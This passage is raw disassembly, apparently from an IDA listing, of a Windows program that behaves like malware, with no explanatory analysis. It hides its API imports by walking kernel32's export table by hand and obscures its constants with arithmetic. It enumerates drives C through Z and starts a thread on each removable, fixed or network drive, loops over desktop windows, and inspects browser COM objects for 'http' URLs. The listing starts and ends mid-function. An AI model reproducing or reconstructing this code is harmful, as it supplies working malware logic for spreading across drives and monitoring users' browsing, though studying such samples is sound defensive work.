mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44A0A0
sub eax, 4
cmp [ebp+var_4], eax
jnz short loc_439967
lea eax, [ebp+var_2C]
push eax
push offset dword_44BA18
push [ebp+var_24]
push [ebp+var_20]
call sub_43F63D
add esp, 10h
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_439967: ; CODE XREF: sub_439857+EB�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp+var_20]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_439979: ; CODE XREF: sub_439857+B6�j
mov eax, [ebp+var_1C]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_439982: ; CODE XREF: sub_439857+50�j
; sub_439857+86�j
xor eax, eax
jmp short loc_43998B
; ---------------------------------------------------------------------------
loc_439986: ; CODE XREF: sub_439857+1F�j
mov eax, 80020003h
loc_43998B: ; CODE XREF: sub_439857+12D�j
pop edi
pop esi
pop ebx
leave
retn 24h
sub_439857 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_439992 proc near ; DATA XREF: sub_439B7B+117�o
push ebp
mov ebp, esp
loc_439995: ; CODE XREF: sub_439992+33�j
movsx eax, word_44A27C
sub eax, 4
push eax
call ds:dword_449630
pop ecx
movsx eax, word_44A218
add eax, dword_44A1AC
sub eax, 0Ah
push eax
push offset sub_43B912
push 0
call ds:dword_444048 ; EnumDesktopWindows
jmp short loc_439995
sub_439992 endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4399CB proc near ; DATA XREF: sub_43EC0A+2C7�o
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_4399E4
; ---------------------------------------------------------------------------
loc_4399DB: ; CODE XREF: sub_4399CB+1C�j
and ds:dword_449790[esi*4], 0
inc esi
loc_4399E4: ; CODE XREF: sub_4399CB+E�j
cmp esi, 5Ah
jbe short loc_4399DB
loc_4399E9: ; CODE XREF: sub_4399CB+192�j
mov edi, 43h
jmp loc_439B44
; ---------------------------------------------------------------------------
loc_4399F3: ; CODE XREF: sub_4399CB+17C�j
mov eax, dword_44A1E8
dec eax
push eax
call ds:dword_449630
push offset word_44B84A
call sub_43C507
push edi
push eax
lea ebx, [ebp+var_E]
push ebx
call ds:dword_449634
add esp, 14h
cmp ds:dword_449790[edi*4], 0
jz short loc_439A5D
mov eax, dword_44A20C
sub eax, 6
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ds:dword_449790[edi*4]
call ds:dword_449650 ; GetExitCodeThread
cmp [ebp+var_14], 103h
jz short loc_439A5D
push ds:dword_449790[edi*4]
call ds:dword_448654 ; CloseHandle
and ds:dword_449790[edi*4], 0
loc_439A5D: ; CODE XREF: sub_4399CB+56�j
; sub_4399CB+7B�j
lea eax, [ebp+var_E]
push eax
call ds:dword_449668 ; GetDriveTypeA
mov [ebp+var_4], eax
cmp eax, 3
jz short loc_439AA5
cmp eax, 4
jz short loc_439AA5
cmp eax, 2
jz short loc_439AA5
cmp ds:dword_449790[edi*4], 0
jz loc_439B43
mov ebx, dword_44A0F8
movsx edx, word_44A0E8
add ebx, edx
sub ebx, 8
mov ds:dword_446630[edi*4], ebx
jmp loc_439B43
; ---------------------------------------------------------------------------
loc_439AA5: ; CODE XREF: sub_4399CB+A2�j
; sub_4399CB+A7�j ...
push 1
call ds:dword_445000 ; SetErrorMode
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_E]
push eax
call ds:dword_4460D4 ; GetDiskFreeSpaceA
mov ebx, dword_44A134
sub ebx, 8
cmp eax, ebx
jnz short loc_439AF1
cmp ds:dword_449790[edi*4], 0
jz short loc_439B43
movsx ebx, word_44A144
sub ebx, 6
mov ds:dword_446630[edi*4], ebx
jmp short loc_439B43
; ---------------------------------------------------------------------------
loc_439AF1: ; CODE XREF: sub_4399CB+107�j
cmp ds:dword_449790[edi*4], 0
jnz short loc_439B43
mov ds:dword_446630[edi*4], edi
lea eax, [ebp+var_28]
push eax
movsx eax, word_44A264
add eax, dword_44A194
sub eax, 12h
push eax
lea ebx, ds:446630h[edi*4]
push ebx
push offset sub_43963B
mov ebx, dword_44A114
add ebx, dword_44A12C
sub ebx, 10h
push ebx
push 0
call ds:dword_449B90 ; CreateThread
mov ds:dword_449790[edi*4], eax
loc_439B43: ; CODE XREF: sub_4399CB+B6�j
; sub_4399CB+D5�j ...
inc edi
loc_439B44: ; CODE XREF: sub_4399CB+23�j
cmp edi, 5Ah
jbe loc_4399F3
mov eax, dword_44A09C
sub eax, 5
push eax
call ds:dword_449630
pop ecx
jmp loc_4399E9
sub_4399CB endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_439B69 proc near ; CODE XREF: sub_43EC0A+27C�p
push 2
call sub_43F5E2
push 0
call sub_43F5E2
add esp, 8
retn
sub_439B69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439B7B proc near ; CODE XREF: sub_43EC0A+2EE�p
var_30D = byte ptr -30Dh
var_30C = byte ptr -30Ch
var_308 = byte ptr -308h
var_302 = byte ptr -302h
var_203 = byte ptr -203h
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
push ebp
mov ebp, esp
sub esp, 310h
push edi
push 0FFh
lea eax, [ebp+var_302]
push eax
call ds:dword_446600 ; GetSystemDirectoryA
lea eax, [ebp+var_203]
push eax
push dword_44A168
push 0
push 1Ch
push 0
call ds:dword_446A44
push offset byte_44B837
call sub_43C507
movsx edi, word_44A1B4
sub edi, 2
push edi
lea edi, [ebp+var_203]
push edi
push eax
push offset dword_4460F0
call ds:dword_449634
push offset dword_44B824
call sub_43C507
movsx edi, word_44A124
sub edi, 4
push edi
lea edi, [ebp+var_203]
push edi
push eax
push offset dword_447260
call ds:dword_449634
lea eax, sub_43F3B6
mov ds:dword_44962C, eax
lea eax, sub_43F3B6
mov ds:dword_44404C, eax
lea eax, sub_43D9B8
mov ds:dword_449774, eax
push offset dword_445020
call sub_43F189
movsx eax, word_44A170
mov edx, dword_44A184
lea eax, [eax+edx+6]
push eax
push offset dword_447230
call sub_43F353
lea eax, sub_440DA6
mov ds:dword_447228, eax
lea eax, sub_43B982
mov ds:dword_446A30, eax
lea eax, dword_4460F0
mov ds:dword_448640, eax
lea eax, dword_447260
mov ds:dword_444018, eax
lea eax, dword_449670
mov dword_44A370, eax
lea eax, [ebp+var_308]
push eax
movsx eax, word_44A230
sub eax, 6
push eax
push 0
push offset sub_439992
push dword_44A1C8
push 0
call ds:dword_449B90 ; CreateThread
push eax
call ds:dword_448654 ; CloseHandle
lea eax, [ebp+var_30C]
push eax
movsx eax, word_44A1E0
sub eax, 3
push eax
push 0
push offset sub_43855F
mov eax, dword_44A148
movsx edx, word_44A170
add eax, edx
sub eax, 4
push eax
push 0
call ds:dword_449B90 ; CreateThread
push eax
call ds:dword_448654 ; CloseHandle
mov eax, dword_44A25C
add eax, 2
mov ds:dword_446620, eax
mov eax, dword_44A0F8
sub eax, 6
push eax
lea eax, [ebp+var_FF]
push eax
call sub_440B97
add esp, 3Ch
mov eax, dword_44A0EC
cmp [ebp+eax+var_103], 64h
jnz short loc_439D58
movsx eax, [ebp+var_FE]
mov edx, dword_44A238
add edx, 1Ch
movsx ecx, word_44A27C
add edx, ecx
sub eax, edx
mov [ebp+var_30D], al
movzx eax, [ebp+var_30D]
push eax
push 0
call sub_440511
add esp, 8
mov eax, dword_44A204
dec eax
mov ds:dword_446620, eax
loc_439D58: ; CODE XREF: sub_439B7B+19D�j
mov eax, dword_44A284
cmp [ebp+eax+var_108], 67h
jnz short loc_439DB9
mov eax, dword_44A1D0
add eax, dword_44A25C
mov edx, dword_44A148
movsx ecx, word_44A22C
add edx, ecx
sub edx, 9
mov [ebp+eax+var_104], dl
lea eax, [ebp+var_FE]
push eax
call ds:dword_444054
mov [ebp-310h], eax
push eax
push offset dword_449670
call sub_43ABE3
add esp, 0Ch
mov eax, dword_44A1D0
sub eax, 7
mov ds:dword_446620, eax
loc_439DB9: ; CODE XREF: sub_439B7B+1EA�j
pop edi
leave
retn
sub_439B7B endp
; =============== S U B R O U T I N E =======================================
sub_439DBC proc near ; DATA XREF: .data:0044A384�o
mov eax, 80004001h
retn 10h
sub_439DBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439DC4 proc near ; CODE XREF: sub_43C2C0+CD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_44A310
push offset dword_44A2D0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_442524
pop ebp
retn
sub_439DC4 endp
; =============== S U B R O U T I N E =======================================
sub_439DDE proc near ; CODE XREF: sub_43EC0A+C�p
push edi
push offset word_44B816
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A29C, eax
test eax, eax
jnz short loc_439E11
push offset dword_44B808
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A29C, eax
loc_439E11: ; CODE XREF: sub_439DDE+1A�j
push offset byte_44B7F5
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44960C, eax
push offset word_44B7E2
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44864C, eax
push offset dword_44B7D0
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446618, eax
push offset byte_44B7BF
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447224, eax
push offset byte_44B7AB
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444050, eax
push offset word_44B79A
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_445010, eax
push offset byte_44B783
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4465F4, eax
push offset dword_44B774
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_448630, eax
push offset byte_44B767
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444004, eax
push offset byte_44B755
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449628, eax
push offset dword_44B744
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449654, eax
push offset word_44B732
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449BA4, eax
push offset byte_44B723
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447220, eax
push offset word_44B716
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449620, eax
push offset byte_44B707
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449644, eax
push offset byte_44B6F9
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444040, eax
push offset byte_44B6E7
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4460DC, eax
push offset byte_44B6D7
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444014, eax
push offset byte_44B6CB
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446A40, eax
push offset byte_44B6BF
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449604, eax
push offset byte_44B6AD
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4465FC, eax
push offset byte_44B69B
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449658, eax
push offset byte_44B68D
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44965C, eax
push offset byte_44B679
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44977C, eax
push offset dword_44B668
call sub_43C507
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44963C, eax
push offset word_44B652
call sub_43C507
add esp, 68h
push eax
push dword_44A29C
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444048, eax
pop edi
retn
sub_439DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A0EE proc near ; CODE XREF: sub_43C2C0+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call ds:dword_447248 ; VirtualAlloc
pop ebp
retn
sub_43A0EE endp
; =============== S U B R O U T I N E =======================================
sub_43A105 proc near ; CODE XREF: sub_44083E+257�p
push edi
push offset dword_44B644
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449664, eax
push offset dword_44B63C
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44500C, eax
push offset dword_44B628
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4465E8, eax
push offset dword_44B618
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447244, eax
push offset byte_44B609
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449788, eax
push offset word_44B5FA
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444008, eax
push offset dword_44B5E8
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449B9C, eax
push offset byte_44B5DB
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449B8C, eax
push offset dword_44B5CC
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_448654, eax
push offset byte_44B5BD
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449624, eax
push offset byte_44B5B1
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444000, eax
push offset word_44B5A6
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4460E0, eax
push offset byte_44B58F
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44400C, eax
push offset dword_44B578
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449640, eax
push offset word_44B562
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449608, eax
push offset word_44B552
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444034, eax
push offset word_44B546
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444028, eax
push offset word_44B536
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447248, eax
push offset byte_44B527
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_448634, eax
push offset byte_44B519
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446A34, eax
push offset dword_44B50C
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44661C, eax
push offset byte_44B4FB
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44725C, eax
push offset word_44B4EA
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44402C, eax
push offset word_44B4DA
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449770, eax
push offset dword_44B4C8
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447258, eax
push offset byte_44B4B7
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_445004, eax
push offset word_44B4AA
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44660C, eax
push offset byte_44B499
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449668, eax
push offset dword_44B484
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449650, eax
push offset dword_44B474
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_445000, eax
push offset byte_44B45F
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4460D4, eax
push offset word_44B452
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447364, eax
push offset word_44B442
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44961C, eax
push offset dword_44B434
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_448648, eax
push offset word_44B41E
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44863C, eax
push offset byte_44B407
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446600, eax
push offset byte_44B3EF
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446A3C, eax
push offset byte_44B3D7
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444010, eax
push offset word_44B3BE
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449614, eax
push offset byte_44B3AB
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449780, eax
push offset byte_44B393
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449778, eax
push offset word_44B382
call sub_43C507
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449B98, eax
push offset dword_44B370
call sub_43C507
add esp, 0ACh
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4465F8, eax
pop edi
retn
sub_43A105 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A5C3 proc near ; CODE XREF: sub_44083E+20F�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_21F = byte ptr -21Fh
var_21E = byte ptr -21Eh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
movsx esi, word_44A1B4
mov edx, dword_44A280
lea ecx, [esi+edx+8]
shr edi, cl
mov esi, dword_44A270
add esi, 0Ah
add esi, dword_44A198
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_43A5FA: ; CODE XREF: sub_43A5C3+5D�j
; sub_43A5C3+99�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_43A622
movsx eax, word_44A0BC
movsx edx, word_44A104
lea eax, [eax+edx+0FFEFh]
sub ebx, eax
jmp short loc_43A5FA
; ---------------------------------------------------------------------------
loc_43A622: ; CODE XREF: sub_43A5C3+44�j
movsx eax, word_44A230
mov edx, dword_44A1D4
lea eax, [eax+edx+34h]
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_43A65E
mov eax, dword_44A1F4
add eax, 0FFFCh
sub ebx, eax
jmp short loc_43A5FA
; ---------------------------------------------------------------------------
loc_43A65E: ; CODE XREF: sub_43A5C3+8B�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_43A68B
mov eax, dword_44A0EC
add eax, 0FFFBh
add eax, dword_44A0F0
sub ebx, eax
jmp loc_43A5FA
; ---------------------------------------------------------------------------
loc_43A68B: ; CODE XREF: sub_43A5C3+AF�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_442F8C
mov eax, dword_44A25C
add eax, dword_44A138
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_43A6ED
; ---------------------------------------------------------------------------
loc_43A6CB: ; CODE XREF: sub_43A5C3+140�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_43A6EA
cmp al, 7Ah
jge short loc_43A6EA
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_43A6EA: ; CODE XREF: sub_43A5C3+114�j
; sub_43A5C3+118�j
inc [ebp+var_4]
loc_43A6ED: ; CODE XREF: sub_43A5C3+106�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, dword_44A0A0
sub edx, 4
cmp eax, edx
jnz short loc_43A6CB
cmp [ebp+var_103], 4Bh
jnz short loc_43A73B
cmp [ebp+var_102], 45h
jnz short loc_43A73B
cmp [ebp+var_101], 52h
jnz short loc_43A73B
cmp [ebp+var_FE], 4Ch
jnz short loc_43A73B
cmp [ebp+var_FD], 33h
jnz short loc_43A73B
cmp [ebp+var_FC], 32h
jz short loc_43A740
loc_43A73B: ; CODE XREF: sub_43A5C3+149�j
; sub_43A5C3+152�j ...
jmp loc_43A96F
; ---------------------------------------------------------------------------
loc_43A740: ; CODE XREF: sub_43A5C3+176�j
movsx eax, word_44A264
add eax, dword_44A248
sub eax, 9
mov [ebp+var_108], eax
jmp loc_43A95A
; ---------------------------------------------------------------------------
loc_43A75B: ; CODE XREF: sub_43A5C3+3A6�j
mov eax, [ebp+var_108]
movsx ecx, word_44A218
dec ecx
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_442F8C
movsx eax, word_44A240
mov edx, eax
add edx, dword_44A238
cmp byte ptr [ebp+edx+var_224+3], 47h
jnz loc_43A954
mov edx, dword_44A0A0
add edx, dword_44A120
cmp byte ptr [ebp+edx+var_228+2], 74h
jnz loc_43A954
cmp [ebp+eax+var_21E], 50h
jnz loc_43A954
movsx eax, word_44A178
movsx edx, word_44A0C0
add eax, edx
cmp [ebp+eax+var_21F], 63h
jnz loc_43A954
mov eax, dword_44A234
add eax, dword_44A154
cmp byte ptr [ebp+eax+var_224+1], 41h
jnz loc_43A954
mov eax, dword_44A1A0
add eax, 2
add eax, dword_44A23C
cmp [ebp+eax+var_21F], 72h
jnz loc_43A954
mov eax, [ebp+var_108]
mov ecx, dword_44A194
sub ecx, 7
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
movsx ecx, word_44A144
sub ecx, 2
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov dword_44A294, ebx
mov ds:dword_4461F8, edx
lea edi, [ebp+var_23D]
lea esi, aCreatethread ; "CreateThread"
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, aEntercriticals ; "EnterCriticalSection"
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, aInitializecrit ; "InitializeCriticalSection"
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, aLeavecriticals ; "LeaveCriticalSection"
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449B90, eax
lea eax, [ebp+var_252]
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449660, eax
lea eax, [ebp+var_26C]
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_445008, eax
lea eax, [ebp+var_281]
push eax
push dword_44A294
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_448650, eax
jmp short loc_43A96F
; ---------------------------------------------------------------------------
loc_43A954: ; CODE XREF: sub_43A5C3+1F1�j
; sub_43A5C3+20B�j ...
inc [ebp+var_108]
loc_43A95A: ; CODE XREF: sub_43A5C3+193�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_43A75B
loc_43A96F: ; CODE XREF: sub_43A5C3:loc_43A73B�j
; sub_43A5C3+38F�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A5C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A974 proc near ; CODE XREF: sub_440EE8+4A�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_442F6C
push ebx
push esi
push edi
cmp dword_44A370, 0
jnz short loc_43A9A4
mov eax, dword_44A0D4
add eax, dword_44A280
cmp ds:dword_446620, eax
jb loc_43ABDE
loc_43A9A4: ; CODE XREF: sub_43A974+17�j
lea eax, [ebp+var_10020]
push eax
call ds:dword_444038
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
mov eax, dword_44A148
sub eax, 2
push eax
push [ebp+arg_0]
call ds:dword_447254
mov edi, eax
mov eax, dword_44A0F4
sub eax, 7
cmp edi, eax
jnz loc_43ABDE
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push offset dword_44BAD8
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word_44A1F0
sub eax, 3
cmp edi, eax
jnz loc_43ABDE
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, dword_44A1A0
sub eax, 3
cmp edi, eax
jnz loc_43ABD8
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_43C434
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call ds:dword_449BA0
cmp [ebp+var_10003], 68h
jnz short loc_43AA8F
cmp [ebp+var_10002], 74h
jnz short loc_43AA8F
cmp [ebp+var_10001], 74h
jnz short loc_43AA8F
cmp [ebp+var_10000], 70h
jz short loc_43AA94
loc_43AA8F: ; CODE XREF: sub_43A974+FE�j
; sub_43A974+107�j ...
jmp loc_43ABD8
; ---------------------------------------------------------------------------
loc_43AA94: ; CODE XREF: sub_43A974+119�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
